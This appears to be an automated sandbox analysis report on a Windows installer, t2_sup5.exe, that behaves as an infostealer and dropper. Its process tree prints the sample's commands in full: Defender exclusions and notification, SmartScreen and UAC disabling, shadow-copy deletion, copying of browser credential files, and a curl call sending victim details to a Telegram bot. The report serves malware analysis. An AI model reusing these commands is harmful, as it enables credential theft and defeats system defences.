Resubmissions
25-01-2023 07:44
230125-jktlcaha3x 10Analysis
-
max time kernel
150s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
25-01-2023 07:44
General
-
Target
t2_sup5.exe
-
Size
23.2MB
-
MD5
0c952979e2d76f8ec17ff34a8023b82b
-
SHA1
7406c03065315f5dd6d84e9443c2f0e92a666c0a
-
SHA256
615beea238930be9e92faf8e7394d59d65000beb9728bb8b38f6b31c83e435e8
-
SHA512
6f6cb2e2606602a74a554b610c4baeb0fb6fe8b310429be330e08e6f1102ea95f36fc80fd981402e40fef652a1da5909eeb154cd4dcbd841bdbf9a0a1834278b
-
SSDEEP
393216:RXZVmGOIszfE1/giQkQJ/y2OFsaetMhSEiCjjngIlGZi4zym8nmjKAO9wV3ajcv1:NOm/giQP/yWaeiSEikjnRYjzMmW99IFP
Malware Config
Signatures
-
Modifies Windows Defender notification settings 3 TTPs 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Windows security bypass 2 TTPs 11 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Executes dropped EXE 23 IoCs
-
Possible privilege escalation attempt 5 IoCs
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 3 IoCs
-
Modifies data under HKEY_USERS 25 IoCs
-
Suspicious behavior: EnumeratesProcesses 56 IoCs
-
Suspicious use of AdjustPrivilegeToken 46 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmp"C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmp" /SL5="$A0046,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im obs64.scr4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe"C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-N7AH8.tmp\t2_sup5.tmp"C:\Users\Admin\AppData\Local\Temp\is-N7AH8.tmp\t2_sup5.tmp" /SL5="$B0044,23846420,160256,C:\Users\Admin\AppData\Local\Temp\t2_sup5.exe" /verysilent /sp-4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby6⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\.cmd""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.exe /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sW:0 reG.eXe add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reG.eXe"C:\Windows\system32\reG.eXe" add "hKLm\SoFTWare\mIcrOsOFt\wIndoWS deFeNder\exclusioNS\eXTensioNs" /V cMd /t reg_dwOrd /d 0 /f9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.eXe /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sw:0 reg.eXe Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe"C:\Windows\system32\reg.eXe" Add "hKlm\sOFTwAre\MiCrOsoFT\wiNdOWs defeNder\eXclUSIOnS\eXTeNSIOns" /V exe /t reg_dwOrd /d 0 /F9⤵
- Windows security bypass
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.exe /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe"C:\Windows\system32\reg.eXe" add "hKlM\soFtWAre\mICrOsoft\WIndoWS defender\eXClUSiOns\PathS" /v "C:\Windows\sYSTeM32\drIvers\etC\hOsts" /T "reg_dWOrd" /d "0" /F9⤵
- Windows security bypass
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\g.cmd""5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cUrL -s ipINFO.io/Ip6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cuRL -s IPINfo.Io/city6⤵
-
C:\Windows\SysWOW64\curl.execuRL -s IPINfo.Io/city7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cUrl -s IPiNfo.io/country6⤵
-
C:\Windows\SysWOW64\curl.execUrl -s IPiNfo.io/country7⤵
-
C:\Windows\SysWOW64\curl.execurl -s -k -d chat_id=1476438440 --data-urlencode "text=Sup5 (21.01.23), File Name: "t2_sup5.exe", IP: 154.61.71.51, Country: NL, City: Aalsmeerderbrug, UserName: Admin, Date: Wed 01/25/2023, 7:44:26" "https://api.telegram.org/bot5705253590:AAFVFnRR0s9sfoSDjSj6MrjbXJ5e1ipXBUM/sendmessage"6⤵
-
C:\Windows\SysWOW64\attrib.exeAttrIb +s +H C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.cmD6⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeAttrIB +s +h C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\.vbs6⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\tmp\obs64.exe"C:\tmp\obs64.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmp"C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmp" /SL5="$301CC,16149264,140800,C:\tmp\obs64.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\tmp\obs64.exe"C:\tmp\obs64.exe" /verysilent /sp-7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmp"C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmp" /SL5="$401CC,16149264,140800,C:\tmp\obs64.exe" /verysilent /sp-8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\tmp\obs64.scr"C:\tmp\obs64.scr"9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\tmp\obs64.sCr"C:\tmp\obs64.sCr"10⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\z7fd3w5dvi22240627656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\vrodf8gv240627656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\ygvf9fsgb240627750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ts29wog7240627750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\zkmttbs67240628031.tmp\" -Force"11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\l83srfk56br1240640656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\rhcd5jjuq9r240640656.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\7qzs86n6k5va4byd240640750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\zb0ng5pb8m3ia6u240640750.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\r7a29ki0240641031.tmp\" -Force"11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\d.cmd""5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\TMP\.CMD" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f3⤵
- Modifies Windows Defender notification settings
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f3⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\schtasks.exeschtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Roaming\obs-studio3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +h C:\tmp3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.exe /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe"C:\Windows\system32\reg.eXe" Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f4⤵
- Windows security bypass
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f1⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f1⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f1⤵
- UAC bypass
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /im smartscreen.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\smartscreen.exe" /reset1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-181⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\system32\smartscreen.exe" /a1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.eXe /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reG.exe"C:\Windows\system32\reG.exe" Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f4⤵
- Windows security bypass
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f1⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f1⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f1⤵
-
C:\Windows\system32\reg.exereg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f1⤵
-
C:\Windows\SysWOW64\curl.execUrL -s ipINFO.io/Ip1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im obs64.scr1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Hidden Files and Directories
2Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\TMP\.CMDFilesize
16KB
MD547386cc9bb737655d78ae888cafd6168
SHA1082a6c195ce3cb6cf683484bd3f0c1c468cec6ab
SHA25674a2dd2c00bd371dfc70131d5364a0f1c64be382503a967b128ee1ec2d5ae7da
SHA512278a019794200427f6f1deb41bde6f52e794b7e36e9a9e6b687eebf658f710212b1c96b1c9a6c7d956363862e508409860c6306ed38c1f61e3a92d4e8a70371f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
C:\Users\Admin\AppData\Local\Temp\d.cmdFilesize
136B
MD5bceac8d436db82dd386b048880fa5ecb
SHA19932ff00adbab1dd86eaf334c942424c042bb69f
SHA2565520a9bb6ce16e831b4596d94a96bb61b0bc971493cad8cb69fab4f5489ab95a
SHA5128829c91a09480755a3d76dfe93292a2652401b757d0f8326a845f9bf5ed35dd5ea133322438f246392a3605543a1ed77ced9a410431ea9d5474b0a3165996959
-
C:\Users\Admin\AppData\Local\Temp\g.cmdFilesize
720B
MD50f4d0a50bb16322d84e9fac068680502
SHA1b4e1b0b69bc8b709e37ad19c1cf37cb58b63ccde
SHA256e56c5fb50aac76941c7ac645cedafbd3577a815bb608582c95f6688f2fb86e54
SHA5124549a63ad1be40570932fc1e1bc932be438091568c1987be2f362acb6cc38a8268fed1dc43ea28f62666c8b30cfebed1119c22f732ba35254c1e91bba6d93bff
-
C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmpFilesize
1.4MB
MD5d50a6bdcf37d093fc472fcbb6489069a
SHA1d3f5d6892e4ce3018f8cf441021ace1d9a5b8732
SHA2564252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e
SHA5128304e0211c2f6c96c3d5836175146a6f66a4deba32678e4da6df1715086c19ff6906f48621c472be0247ebd7f18851fc63f72d0657c6b686e1ae9d616c088a4e
-
C:\Users\Admin\AppData\Local\Temp\is-0EB53.tmp\obs64.tmpFilesize
1.4MB
MD5d50a6bdcf37d093fc472fcbb6489069a
SHA1d3f5d6892e4ce3018f8cf441021ace1d9a5b8732
SHA2564252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e
SHA5128304e0211c2f6c96c3d5836175146a6f66a4deba32678e4da6df1715086c19ff6906f48621c472be0247ebd7f18851fc63f72d0657c6b686e1ae9d616c088a4e
-
C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmpFilesize
1.4MB
MD5a24e73bcea94f3a5f6ce6034dc01e3b3
SHA17d44374441a69acb8d29fbfc25e786dbbcab4139
SHA256118ec78c15f55fb81f6cfc2d2c62268097af3a00cd3d18f1dc30ff4ce06cd44e
SHA512f05f3fc002cfe2b98ebfebde5c0cb64e436bec9fe6cc1e3cc77fe6505d5ba08e349ed509fd3026a4e1f56d4a1d57e9c108da99740e003b8683d8a460da3a849c
-
C:\Users\Admin\AppData\Local\Temp\is-5S8O5.tmp\t2_sup5.tmpFilesize
1.4MB
MD5a24e73bcea94f3a5f6ce6034dc01e3b3
SHA17d44374441a69acb8d29fbfc25e786dbbcab4139
SHA256118ec78c15f55fb81f6cfc2d2c62268097af3a00cd3d18f1dc30ff4ce06cd44e
SHA512f05f3fc002cfe2b98ebfebde5c0cb64e436bec9fe6cc1e3cc77fe6505d5ba08e349ed509fd3026a4e1f56d4a1d57e9c108da99740e003b8683d8a460da3a849c
-
C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmpFilesize
1.4MB
MD5d50a6bdcf37d093fc472fcbb6489069a
SHA1d3f5d6892e4ce3018f8cf441021ace1d9a5b8732
SHA2564252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e
SHA5128304e0211c2f6c96c3d5836175146a6f66a4deba32678e4da6df1715086c19ff6906f48621c472be0247ebd7f18851fc63f72d0657c6b686e1ae9d616c088a4e
-
C:\Users\Admin\AppData\Local\Temp\is-HFMFA.tmp\obs64.tmpFilesize
1.4MB
MD5d50a6bdcf37d093fc472fcbb6489069a
SHA1d3f5d6892e4ce3018f8cf441021ace1d9a5b8732
SHA2564252ef0ec82de8b6634f1b873cbd0a73193bd64dd49cf36f598940817835e10e
